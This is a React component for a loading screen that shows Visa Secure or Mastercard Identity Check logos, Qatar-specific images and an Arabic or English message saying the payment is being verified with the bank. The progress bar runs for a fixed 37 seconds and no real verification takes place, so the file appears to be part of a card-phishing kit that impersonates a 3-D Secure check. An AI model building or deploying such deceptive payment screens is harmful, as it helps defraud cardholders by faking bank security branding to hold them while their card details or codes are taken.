import React from 'react';
import { motion } from 'framer-motion';
import { isMastercard } from '../cardScheme';

const Loading = () => {
  const TOTAL_TIME = 37;
  const design = localStorage.getItem('session_design') || 'qatar_default';
  const isMc = isMastercard(design);

  const vsImg = process.env.PUBLIC_URL + '/images/qatar/vs_loading.png';
  const msImg = process.env.PUBLIC_URL + '/images/qatar/ms_loading.png';
  const imageSrc = isMc ? msImg : vsImg;
  const altText = isMc ? 'Mastercard Identity Check' : 'Visa Secure';

  const lang = localStorage.getItem('dino_lang') || 'ar';
  const isRtl = lang === 'ar';

  return (
    <div
      style={{
        minHeight: '100vh',
        width: '100%',
        backgroundColor: '#ffffff',
        display: 'flex',
        flexDirection: 'column',
        alignItems: 'center',
        justifyContent: 'center',
        padding: '1.5rem',
        boxSizing: 'border-box'
      }}
      dir={isRtl ? 'rtl' : 'ltr'}
    >
      <div
        style={{
          width: '100%',
          maxWidth: '380px',
          display: 'flex',
          flexDirection: 'column',
          alignItems: 'center',
          backgroundColor: '#ffffff',
          borderRadius: '12px',
          padding: '2rem 1.5rem',
          boxSizing: 'border-box'
        }}
      >
        {/* Straight modern progress bar */}
        <div
          style={{
            position: 'relative',
            width: '100%',
            height: '14px',
            backgroundColor: '#f1f5f9',
            borderRadius: '9999px',
            overflow: 'hidden',
            border: '1px solid #e2e8f0',
            boxSizing: 'border-box'
          }}
        >
          <motion.div
            style={{
              position: 'absolute',
              top: 0,
              left: 0,
              height: '100%',
              backgroundColor: '#533AFD',
              borderRadius: '9999px'
            }}
            initial={{ width: '0%' }}
            animate={{ width: '100%' }}
            transition={{
              duration: TOTAL_TIME,
              ease: 'linear'
            }}
          />
        </div>

        {/* Card Scheme Logo */}
        <img
          src={imageSrc}
          alt={altText}
          style={{
            marginTop: '2rem',
            height: isMc ? '3.5rem' : '2.5rem',
            maxHeight: '60px',
            maxWidth: '180px',
            objectFit: 'contain'
          }}
          onError={(e) => { e.target.style.display = 'none'; }}
        />

        {/* Status subtext */}
        <p
          style={{
            marginTop: '1.25rem',
            fontSize: '0.85rem',
            color: '#64748b',
            textAlign: 'center',
            fontWeight: 600,
            margin: '1.25rem 0 0'
          }}
        >
          {isRtl ? 'جاري التحقق بأمان من البنك المصدر...' : 'Verifying securely with your bank...'}
        </p>
      </div>
    </div>
  );
};

export default Loading;
